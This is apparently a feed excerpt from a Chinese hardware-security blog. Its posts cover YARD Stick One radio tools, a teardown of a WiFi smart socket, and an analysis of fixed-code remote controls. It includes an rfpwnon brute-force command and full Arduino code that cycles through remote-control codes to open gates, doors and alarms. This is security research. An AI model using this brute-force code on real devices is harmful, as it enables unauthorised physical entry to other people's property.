次。这会花费很多时间来发送完所有的信号。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./rfpwnon.py -f 315060000 -b 1818 -l 16 -r 2</span><br></pre></td></tr></table></figure><h2 id="3-ToorChat"><a href="#3-ToorChat" class="headerlink" title="3. ToorChat"></a>3. ToorChat</h2><p><a href="https://github.com/hathcox/ToorChat" target="_blank" rel="noopener">ToorChat</a> 是一款使用 <a href="https://greatscottgadgets.com/tc13badge/" target="_blank" rel="noopener">ToorCon 2013 徽章</a>的聊天应用程序。<br>YARD State One 的硬件设计上与 ToorCon 2013 badge 使用的芯片与固件是一样的,所以这程序也是可以通用的。<br>ToorChat 聊天工具使用时需要至少两个 RfCat 支持的硬件才能通过无线电正常通信。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/hak5/ToorChat.git</span><br><span class="line"><span class="built_in">cd</span> ToorChat</span><br><span class="line">./toorchat.py</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-05-17_01-0003.png" alt=""></p><h2 id="4-固件"><a href="#4-固件" class="headerlink" title="4. 固件"></a>4. 固件</h2><p>YARD Stick One 的固件就是 <a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">rfcat</a> 提供的,Bootloader 使用的是 <a href="https://github.com/AdamLaurie/CC-Bootloader" target="_blank" rel="noopener">CC-Bootloader</a>。固件和硬件是开源的,你可以自己编写固件实现你需要的功能。</p><hr><h2 id="链接"><a href="#链接" class="headerlink" title="链接"></a>链接</h2><ul><li><a href="http://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">Great Scott Gadgets - YARD Stick One</a></li><li><a href="https://github.com/greatscottgadgets/yardstick" target="_blank" rel="noopener">GitHub: YARD Stick One</a></li><li><a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">rfcat project</a></li><li><a href="https://andrewmohawk.com/2012/09/06/hacking-fixed-key-remotes/" target="_blank" rel="noopener">Hacking fixed key remotes</a></li><li><a href="http://andrewmohawk.com/2015/08/31/hacking-fixed-key-remotes-with-only-rfcat/" target="_blank" rel="noopener">Hacking fixed key remotes with (only) RFCat</a></li><li><a href="https://www.youtube.com/watch?v=pkTlTCUeec0" target="_blank" rel="noopener">How to begin hacking with the YARD Stick One - Hak5 1908</a></li><li><a href="https://www.youtube.com/watch?v=F3bISk5t8cA" target="_blank" rel="noopener">How to Hack Wireless Remotes with Radio Replay Attacks - Hak5 1909</a></li><li><a href="https://www.youtube.com/watch?v=EZU2AZtfJbI" target="_blank" rel="noopener">Hacking Wireless Doorbells and Software Defined Radio tips - Hak5 1910</a></li><li><a href="https://www.youtube.com/watch?v=LqmVaf2KHYA" target="_blank" rel="noopener">Hacking Keyless Entry Remotes - Hak5 1911</a></li><li><a href="https://www.youtube.com/watch?v=blpycY5JCm0" target="_blank" rel="noopener">How to Hack Radio with Brute Force Attacks - Hak5 1912</a></li><li><a href="https://www.youtube.com/watch?v=eVqIe3na_Zk" target="_blank" rel="noopener">Radio Hacking: Reverse Engineering Protocols Part 1 - Hak5 1913</a></li><li><a href="https://www.youtube.com/watch?v=vf38-8LbDuw" target="_blank" rel="noopener">Radio Hacking: Reverse Engineering Protocols Part 2 - Hak5 1914</a></li><li><a href="https://pandwarf.com/news/yard-stick-one-vs-rtl-sdr-vs-pandwarf/" target="_blank" rel="noopener">Yard Stick One vs RTL-SDR vs PandwaRF: Fight of the dwarves</a></li><li><a href="http://greatscottgadgets.com/2015/12-29-rapid-radio-reversing-toorcon-2015/" target="_blank" rel="noopener">Rapid Radio Reversing, ToorCon 2015</a></li><li><a href="https://github.com/gyaresu/opensesame-yardstick" target="_blank" rel="noopener">opensesame-yardstick</a></li><li><a href="https://www.hak5.org/episodes/hak5-1908-how-to-begin-hacking-with-the-yard-stick-one" target="_blank" rel="noopener">Hak5 1908 – How to begin hacking with the YARD Stick One</a></li><li><a href="http://leetupload.com/blagosphere/index.php/2014/02/16/you-know-how-to-send-my-signal-setting-up-rfcat-from-scratch/" target="_blank" rel="noopener">You know how to send my signal — Setting up RFCat from scratch</a></li><li><a href="https://www.legacysecuritygroup.com/index.php/categories/13-sdr/22-rfpwnon-py-the-ultimate-rfcat-ask-ook-brute-force-tool" target="_blank" rel="noopener">rfpwnon.py rfcat ASK OOK brute force tool</a></li></ul>]]></content>
<summary type="html">
<p><a href="https://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">YARD Stick One</a> 是一款 1 GHz 以下的 USB 无线收发器设备,基于 TI 的 <a href="http://www.ti.com/product/CC1110-CC1111" target="_blank" rel="noopener">CC1111</a> 芯片。你可以将 YARD Stick One 用于进行各种遥控信号的重放,汽车遥控锁的安全研究等。</p>
</summary>
<category term="Hardware" scheme="https://blog.iternull.com/tags/Hardware/"/>
<category term="Radio" scheme="https://blog.iternull.com/tags/Radio/"/>
<category term="YARD Stick One" scheme="https://blog.iternull.com/tags/YARD-Stick-One/"/>
</entry>
<entry>
<title>ITEAD 86式WiFi智能插座拆解</title>
<link href="https://blog.iternull.com/posts/2017/03/01/Itead-Wall-WiFi-Smart-Socket.html"/>
<id>https://blog.iternull.com/posts/2017/03/01/Itead-Wall-WiFi-Smart-Socket.html</id>
<published>2017-03-01T07:30:20.000Z</published>
<updated>2017-03-24T22:14:04.478Z</updated>
<content type="html"><![CDATA[<p>在淘宝上发现了一款我非常想要的产品,还是 ITEAD 生产的。在这款产品之前已经有一些智能家居的产品了,比如小米家就有很多款智能家居产品。但都有一个共同点,不能兼容其它厂商的产品,你也没法自定义它。<br>但 ITEAD 的产品有一个特点,就是会留一个串口给用户,在不损坏产品的情况下能刷其它固件,给了用户更多的控制权。另一点 ITEAD 的 WiFi 智能家居产品使用的芯片基本上都是 <a href="http://www.esp8266.com/wiki/doku.php?id=start" target="_blank" rel="noopener">ESP8266</a> 这也是非常好的一点, ESP8266 是一款很好的 WiFi 芯片,易于开发,有很多活跃的开发社区和用户。<br><a id="more"></a></p><h3 id="购买链接-Buy"><a href="#购买链接-Buy" class="headerlink" title="购买链接 (Buy)"></a>购买链接 (Buy)</h3><blockquote><ul><li><a href="https://item.taobao.com/item.htm?spm=a1z09.2.0.0.FKIVK3&id=530885314299&_u=111dg2jm9dab" target="_blank" rel="noopener">淘宝</a></li><li><a href="https://www.aliexpress.com/item/2016-New-Arrival-Smart-Wireless-WIFI-Control-Socket-Plug-With-Android-IOS-Phone-App-White-Remote/32703922119.html" target="_blank" rel="noopener">AliExpress</a></li></ul></blockquote><p><img src="//files.iternull.com/images/2017-03-01_01-0001.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0002.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0003.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0004.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0005.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0006.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0007.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0008.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0009.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0010.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0011.jpg" alt=""></p><p>这款产品芯片使用的是 <a href="http://www.esp8266.com/wiki/doku.php?id=start" target="_blank" rel="noopener">ESP8266</a> Flash memory 使用的是 <a href="http://www.datasheetspdf.com/datasheet/PN25F08.html" target="_blank" rel="noopener">PN25F08</a> 并预留了串口焊盘,这给用户自定义硬件提供了方便。<br>但还有些地方值得继续改进,首先看产品外观的第一感觉就是做的有些粗糙。其次安全性有待提高,插座口没有带安全门,有小孩子的家庭谨慎购买,这会增加孩子触电的几率。<br>内部的 AC 转 DC 电源模块设计的不是很安全,特别是交流电输入端,用长排针连接这一点。给装固定螺丝留的翻盖式设计,当盖回去的时候红色的火线容易卡住旁边的 PCB 电路板,这既不方便也不安全。</p><p>如果有兴趣可以尝试使用 <a href="http://www.letscontrolit.com/wiki/index.php/ESPEasy" target="_blank" rel="noopener">ESPEasy</a> 固件去兼容其它云平台实现操控,打造自己的智能家。</p><p>总体来说这是一款物有所值的产品,48人民币包邮,远低于小米智能插座基础版的价格。更重要的是这为以后的智能家装市场迈出第一步。</p>]]></content>
<summary type="html">
<p>在淘宝上发现了一款我非常想要的产品,还是 ITEAD 生产的。在这款产品之前已经有一些智能家居的产品了,比如小米家就有很多款智能家居产品。但都有一个共同点,不能兼容其它厂商的产品,你也没法自定义它。<br>但 ITEAD 的产品有一个特点,就是会留一个串口给用户,在不损坏产品的情况下能刷其它固件,给了用户更多的控制权。另一点 ITEAD 的 WiFi 智能家居产品使用的芯片基本上都是 <a href="http://www.esp8266.com/wiki/doku.php?id=start" target="_blank" rel="noopener">ESP8266</a> 这也是非常好的一点, ESP8266 是一款很好的 WiFi 芯片,易于开发,有很多活跃的开发社区和用户。<br>
</summary>
<category term="WiFi" scheme="https://blog.iternull.com/tags/WiFi/"/>
<category term="Smart Socket" scheme="https://blog.iternull.com/tags/Smart-Socket/"/>
<category term="ITEAD" scheme="https://blog.iternull.com/tags/ITEAD/"/>
</entry>
<entry>
<title>分析无线遥控器信号并制作 Hack 硬件进行攻击</title>
<link href="https://blog.iternull.com/posts/2017/02/04/Use-Arduino-brute-force-to-attack-remote-control.html"/>
<id>https://blog.iternull.com/posts/2017/02/04/Use-Arduino-brute-force-to-attack-remote-control.html</id>
<published>2017-02-04T14:32:46.000Z</published>
<updated>2017-02-26T13:51:10.024Z</updated>
<content type="html"><![CDATA[<p>无线遥控器(无线电遥控器)在我们生活中非常常见,应用于各种场景,方便着用户的使用。不过大多数还是用于安防方面的,比如: 遥控报警器、电动卷帘门、电动伸缩门、遥控电开关、无线遥控门铃……<br>不过国内关注和研究这类硬件安全的人比较少,我知道你们大多都是 Web 安全狗,我挖洞挖不过你们所以做了一只硬件安全狗。<br><a id="more"></a></p><h2 id="1、无线遥控器简介"><a href="#1、无线遥控器简介" class="headerlink" title="1、无线遥控器简介"></a>1、无线遥控器简介</h2><p>无线遥控器从安全角度看大致分为两类,一类是最普遍的固定码遥控器,特点是廉价、应用广泛、市场大、用户多;另一类是滚动码遥控器,特点是价格较贵、相对比较安全、用于汽车安全防盗等安全要求较高的地方。</p><p>固定码遥控器有很多种编码方式,国内常见的是 3 态 8 位的编码或者厂商出厂时烧录的随机码。滚动码这里不做讲解,我都还得到这类遥控器,滚动码相对来说比较安全,但也并非绝对安全,你的汽车用到就是滚动码遥控器,然而盗贼在 N 年前就能买到干扰破解你汽车防盗的设备了。</p><p>无线遥控器从信号调制方式可以大致分成 <a href="https://en.wikipedia.org/wiki/On-off_keying" target="_blank" rel="noopener">OOK</a> 和 <a href="https://en.wikipedia.org/wiki/Frequency-shift_keying" target="_blank" rel="noopener">FSK</a> 两种方式,当然这只是常见的,还有其他的信号调制方式。</p><h2 id="2、三态八位遥控器"><a href="#2、三态八位遥控器" class="headerlink" title="2、三态八位遥控器"></a>2、三态八位遥控器</h2><p>3 态 8 位遥控器是我们常见的遥控器,它属于固定码遥控器。在电瓶车防盗器、电动卷帘门、电动伸缩门、遥控电开关、无线遥控门铃这些应用中都能见到这种遥控器,因为这种遥控器很廉价。</p><h3 id="2-1-什么是三态八位遥控器?"><a href="#2-1-什么是三态八位遥控器?" class="headerlink" title="2.1 什么是三态八位遥控器?"></a>2.1 什么是三态八位遥控器?</h3><p>3 态 8 位遥控器顾名思义,它有 3 种码位状态 8 个码位。二进制是由 <code>0</code> 和 <code>1</code> 组成的,所以 2 位(bit)长的二进制有 4 种可能性 <code>00</code> <code>01</code> <code>10</code> <code>11</code> , 3 态 8 位遥控器使用的是这其中的 3 种 <code>00</code> <code>01</code> <code>11</code> 这是 3 态。<br>8 位是指有 8 个编码位,每个编码位可使用 3 态中的任意一种,所以是 <code>2 * 8 = 16</code> 总共 16 位(bit)长的二进制,但是常见的无线遥控器是的数据长度是 24 位(bit),因为后 8 位(bit)是定义按键值的(如果你对信号解码出来的是 25 位(bit)长,你可以除去末尾的 <code>0</code> ;如果是 25 位(bit)长,末尾的是 <code>1</code> 这可能是你解码错了)。<br>常见的 4 键遥控器的的每个键值都是出厂就固定了的,分别是 <code>11000000</code> <code>00110000</code> <code>00001100</code> <code>00000011</code></p><h3 id="2-2-厂商烧录的固定码"><a href="#2-2-厂商烧录的固定码" class="headerlink" title="2.2 厂商烧录的固定码"></a>2.2 厂商烧录的固定码</h3><p>如果你的固定码遥控器解码后的二进制中有一对 <code>10</code> 码(注意是一对,前一对的后 <code>1</code> 跟后一对的前 <code>0</code> 组成的 <code>10</code> 是不算的)这说明你的遥控器不属于 3 态 8 位遥控器,是厂商出厂时烧录的固定码,这种遥控器的后 8 位(bit)按键值也不一定是标准的 4 种可能性。</p><p>这类固定码遥控器的接收端一般都是学习行的,会有一个学习键。作用是配对新的遥控器,如果当前遥控器坏了,你可以买个同类型的遥控器,长按学习键再按遥控器,就可以学习到新遥控器的编码的信息,这样你就能继续使用了。</p><h3 id="2-3-辨别是否是三态八位"><a href="#2-3-辨别是否是三态八位" class="headerlink" title="2.3 辨别是否是三态八位"></a>2.3 辨别是否是三态八位</h3><p>辨别是否是 3 态 8 位遥控器最靠谱的方法就是拆开来看 PCB 板子,有 3 排 8 列焊盘的肯定是,否则就不是,使用 3 态 8 位拨码开关的也是。</p><p><img src="//files.iternull.com/images/2017-02-04_01-0001.png" alt=""></p><h3 id="2-4-三态八位遥控器编码"><a href="#2-4-三态八位遥控器编码" class="headerlink" title="2.4 三态八位遥控器编码"></a>2.4 三态八位遥控器编码</h3><p>国内常见的编码方法都是直接焊接 PCB 上的焊盘,极少使用拨码开关,节省成本?当然你也能买到 3 态 8 位的拨码遥控器。</p><p><img src="//files.iternull.com/images/2017-02-04_01-0002.png" alt=""></p><p>从上图中可以看出总共有 3 排 8 列焊盘,这也就是 3 态(上中下) 8 位的定义方式。中间的一排连接的是芯片的引脚,当芯片的一个引脚与 High 焊接上后产生的编码是 <code>11</code> 与 Low 焊接上后产生的编码是 <code>00</code> 不焊接的默认编码是 <code>01</code> 。</p><p>编码是成对的,遥控器上是这个编码,接收器上也得是这个编码否则是没法使用的。</p><h2 id="3、分析安全缺陷"><a href="#3、分析安全缺陷" class="headerlink" title="3、分析安全缺陷"></a>3、分析安全缺陷</h2><p>从上文中我们知道了遥控器的二进制编码长度是 24 位(bit),前 16 位(bit)是由 3 态 8 位编码方式定义的,后 8 位(bit)是厂商固定死的的按键值。一个遥控器上的每个按键的前 16 位(bit)都是一样的,后 8 位(bit)是不一样的,就 4 种可能性。<br>假设如果每个按键都是没有规律的随机码,那么你想通过暴力穷举出正确的编码,你需要尝试 <code>2 ^ 24 = 16777216</code> 总共 16777216 种可能性。<br>假设后 8 位(bit)是固定的 4 种可能性,前 16 位(bit)是随机的,那你只需要尝试前 16 位(bit)的所有可能性在拼接上后 8 位(bit)的固定值,你需要尝试 <code>2 ^ 16 = 65536</code> <code>4 ^ 8 = 65536</code> 每个按键总共 65536 种可能性。<br>由于 3 态 8 位里是没有 <code>10</code> 码的,所有你需要尝试的次数是 <code>3 ^ 8 = 6561</code> 每个按键总共 6561 种可能性。</p><p>知道了暴力穷举攻击需要尝试的次数后我们再来算一下需要的时间,我对一个普通的遥控器做信号发送的采集,10 秒钟时间内我在接收端收到一百零几次遥控信号,也就是说一分钟至少可以发送(尝试) 600 个可能性。<br>尝试 24 位(bit)长度的所有组合所需的时间是 <code>16777216 / 600 = 27962</code> 27962 分钟左右,大概 20 天不到。尝试 16 位(bit)长度一个按键的所有组合所需的时间是 <code>65536 / 600 = 109</code> 109 分钟左右,大概一个多小时。<br>尝试 3 态 8 位一个按键的所有组合所需的时间是 <code>6561 / 600 = 11</code> 大概 11 分钟左右!!</p><p>那么 <a href="https://samy.pl/" target="_blank" rel="noopener">Samy Kamkar</a> 在 8 秒内打开车库门的 <a href="http://samy.pl/opensesame/" target="_blank" rel="noopener">OpenSesame</a> 项目是怎么做到的?<br>首先 Samy Kamkar 的那个车库门的遥控器并非是 3 态 8 位的,编码长度好像只有 12 位(bit), <code>2 ^ 12 = 4096</code> 总共 4096 种组合。<br>最关键是遥控设备的接收端使用的是<a href="https://en.wikipedia.org/wiki/Shift_register" target="_blank" rel="noopener">移位寄存器</a>,所以使用 <a href="https://en.wikipedia.org/wiki/De_Bruijn_sequence" target="_blank" rel="noopener">De Bruijn 序列</a> 即可在非常短的时间内完成所有可能性的尝试。</p><p>但我们常见的 3 态 8 位遥控设备的接收端用得并非是移位寄存器,所以没法使用 De Bruijn 序列实现暴力穷举攻击。检测接收端是否使用了移位寄存器的一个方法是在正确的编码前加个 <code>0</code> 。<br>如果使用了移位寄存器,那么会跳过错误的一个位(bit)检查下一个正确的,并给予响应。如果没使用移位寄存器,那么什么反应都没有,因为你发送的这个编码是错误的。</p><h2 id="4、制作-Hacking-硬件"><a href="#4、制作-Hacking-硬件" class="headerlink" title="4、制作 Hacking 硬件"></a>4、制作 Hacking 硬件</h2><p>从上面理论分析中我们知道了这种遥控设备所存在的其中一个缺陷,要尝试利用这个缺陷实现对设备的攻击方法不止一种。你可以抱着你的笔记本和 SDR 设备去攻击它,或者我们尝试制作自己的便捷式硬件来利用这个缺陷实现对设备的攻击。</p><p>这个我们使用 Arduino 和 RF 模块实现攻击功能。使用 Arduino 是因为廉价、易上手,当然你有能力的话也可以使用其他单片机去实现,或者自己设计电路,使用更好的 CC1111 芯片去实现 RF 功能。</p><h3 id="4-1-硬件列表"><a href="#4-1-硬件列表" class="headerlink" title="4.1 硬件列表"></a>4.1 硬件列表</h3><ol><li>Arduino Pro Micro</li><li>315 MHz or 433 MHz 无线模块</li><li>轻触按钮</li><li>10 K 电阻</li><li>面包板</li><li>面包板跳线</li></ol><h3 id="4-2-硬件连接方式"><a href="#4-2-硬件连接方式" class="headerlink" title="4.2 硬件连接方式"></a>4.2 硬件连接方式</h3><p><img src="//files.iternull.com/images/2017-02-04_01-0003.png" alt=""><br><img src="//files.iternull.com/images/2017-02-04_01-0004.jpg" alt=""></p><h3 id="4-3-功能代码"><a href="#4-3-功能代码" class="headerlink" title="4.3 功能代码"></a>4.3 功能代码</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> Brute Force Attack 4 ^ 8 Remote Control</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment"> https://github.com/iternull/bruteforce3-8remote</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><RCSwitch.h></span></span></span><br><span class="line"></span><br><span class="line">RCSwitch mySwitch = RCSwitch();</span><br><span class="line"></span><br><span class="line"><span class="comment">// 定义 4 个按键针脚</span></span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_a = <span class="number">10</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_b = <span class="number">16</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_c = <span class="number">14</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_d = <span class="number">15</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> butStatA = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> butStatB = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> butStatC = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> butStatD = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> dfa = <span class="number">256</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line"> Serial.begin(<span class="number">9600</span>);</span><br><span class="line"> </span><br><span class="line"> mySwitch.enableTransmit(<span class="number">9</span>); <span class="comment">// 定义发送模块的数据传输针脚</span></span><br><span class="line"> mySwitch.setPulseLength(<span class="number">170</span>); <span class="comment">// 定义脉冲长度,这个值具体看你使用的遥控器而定</span></span><br><span class="line"> pinMode(button_a, INPUT);</span><br><span class="line"> pinMode(button_b, INPUT);</span><br><span class="line"> pinMode(button_c, INPUT);</span><br><span class="line"> pinMode(button_d, INPUT);</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="comment">// read the state of the pushbutton value:</span></span><br><span class="line"> butStatA = digitalRead(button_a);</span><br><span class="line"> butStatB = digitalRead(button_b);</span><br><span class="line"> butStatC = digitalRead(button_c);</span><br><span class="line"> butStatD = digitalRead(button_d);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Button A</span></span><br><span class="line"> <span class="keyword">if</span> (butStatA == HIGH) { <span class="comment">// check if the pushbutton is pressed.</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65535</span>; i++ ){</span><br><span class="line"> <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">192</span>);</span><br><span class="line"> mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Button B</span></span><br><span class="line"> <span class="keyword">if</span> (butStatB == HIGH) {</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65535</span>; i++ ){</span><br><span class="line"> <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">48</span>);</span><br><span class="line"> mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Button C</span></span><br><span class="line"> <span class="keyword">if</span> (butStatC == HIGH) {</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65535</span>; i++ ){</span><br><span class="line"> <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">12</span>);</span><br><span class="line"> mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Button D</span></span><br><span class="line"> <span class="keyword">if</span> (butStatD == HIGH) {</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65535</span>; i++ ){</span><br><span class="line"> <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">3</span>);</span><br><span class="line"> mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><ul><li>注:这段代码实现的是发送 <code>4 ^ 8</code> 的所有可能性。</li></ul><p>生成 <code>3 ^ 8</code> 的所有可能性的算法我还没实现,暂时也没时间去继续研究如何实现了,<strong>过完年得去找工作了</strong>。</p><h2 id="5、总结"><a href="#5、总结" class="headerlink" title="5、总结"></a>5、总结</h2><p>在实际测试中暴力穷举攻击确实是有效的,但由于时间匆忙,硬件设计和代码都不是最优化的,所攻击的速度还是差了点。如果你使用的是这种类型的遥控设备也不用担心会这么样。</p><p><a href="https://github.com/iternull/bruteforce3-8remote" target="_blank" rel="noopener">bruteforce3-8remote</a> 这个项目后续还会更新,争取达到最高的可用度,还会再加一些功能。<br>目前我得先去忙着找工作,才是正事。未来还会研究一些其他的硬件安全的破解/逆向项目的。</p><p>最后感谢一下我的一位小伙伴(匿名)给的一些帮助。</p>]]></content>
<summary type="html">
<p>无线遥控器(无线电遥控器)在我们生活中非常常见,应用于各种场景,方便着用户的使用。不过大多数还是用于安防方面的,比如: 遥控报警器、电动卷帘门、电动伸缩门、遥控电开关、无线遥控门铃……<br>不过国内关注和研究这类硬件安全的人比较少,我知道你们大多都是 Web 安全狗,我挖洞挖不过你们所以做了一只硬件安全狗。<br>
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
<category term="Attack" scheme="https://blog.iternull.com/tags/Attack/"/>
<category term="Arduino" scheme="https://blog.iternull.com/tags/Arduino/"/>
<category term="Brute Force" scheme="https://blog.iternull.com/tags/Brute-Force/"/>
</entry>
<entry>
<title>解码无线遥控器信号的 N 种方法</title>
<link href="https://blog.iternull.com/posts/2017/02/02/Decoding-Remote-Control-Signals.html"/>
<id>https://blog.iternull.com/posts/2017/02/02/Decoding-Remote-Control-Signals.html</id>
<published>2017-02-02T14:38:14.000Z</published>
<updated>2017-02-11T05:57:02.102Z</updated>
<content type="html"><![CDATA[<p>本文中的无线遥控器指的是以 <a href="https://en.wikipedia.org/wiki/On-off_keying" target="_blank" rel="noopener">OOK</a> 方式调制信号的无线遥控器,这是我们在生活中最常见的遥控器。<br><a id="more"></a></p><p><img src="//files.iternull.com/images/2017-02-02_01-0001.jpg" alt=""> </p><h3 id="1、RC-Switch"><a href="#1、RC-Switch" class="headerlink" title="1、RC Switch"></a>1、RC Switch</h3><p><a href="https://github.com/sui77/rc-switch" target="_blank" rel="noopener">rc switch</a> 是 <a href="https://www.arduino.cc/" target="_blank" rel="noopener">Arduino</a> 的一个库。这个库可以让你使用 Arduino 接收/解码遥控器信号,并发送自定义编码的信号。</p><p><img src="//files.iternull.com/images/2017-02-02_01-0002.png" alt=""> </p><h3 id="2、RTL-433"><a href="#2、RTL-433" class="headerlink" title="2、RTL_433"></a>2、RTL_433</h3><p><a href="https://github.com/merbanan/rtl_433" target="_blank" rel="noopener">rtl_433</a> 是一个基于 <code>RTL2832</code> 电视棒的 <code>433.92 MHz</code> 通用数据接收器,设计是被用来解码无线温度计数据的,也具有解码其他常见信号编码的功能。<br> <code>rtl_433</code> 并非只能接收 <code>433 MHz</code> 频段的信号,默认是接收 <code>433920000 Hz</code> 的频段,可以通过 <code>-f</code> 参数指定频段。</p><p><img src="//files.iternull.com/images/2017-02-02_01-0003.png" alt=""></p><h3 id="3、RFCat"><a href="#3、RFCat" class="headerlink" title="3、RFCat"></a>3、RFCat</h3><p><a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">rfcat</a> 是一个基于 <a href="http://www.ti.com/" target="_blank" rel="noopener">TI</a> <a href="http://www.ti.com/product/CC1110-CC1111" target="_blank" rel="noopener">C1111</a> 芯片的项目。<br>rfcat 支持 <a href="http://www.ti.com/tool/cc1111emk868-915" target="_blank" rel="noopener">CC1111EMK</a>、<a href="http://www.ti.com/tool/EZ430-CHRONOS" target="_blank" rel="noopener">Chronos USB RF Dongle</a>、<a href="http://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">YARD Stick One</a> 3 款硬件,这 3 款硬件都支持收发功能,价格也比较贵。<br>需要在硬件上刷上 rfcat 制定的 Bootloader 才能使用,rfcat 客户端是 Python 语言编写的,对其再开发也比较容易,其中有款名叫 <a href="https://github.com/exploitagency/github-rfpwnon" target="_blank" rel="noopener">rfpwnon</a> 的信号暴力攻击攻击就是再其基础上开发的。</p><h3 id="4、Inspectrum"><a href="#4、Inspectrum" class="headerlink" title="4、Inspectrum"></a>4、Inspectrum</h3><p><a href="https://github.com/miek/inspectrum" target="_blank" rel="noopener">inspectrum</a> 是一款专业的用于对来着 <a href="https://en.wikipedia.org/wiki/Software-defined_radio" target="_blank" rel="noopener">SDR</a> 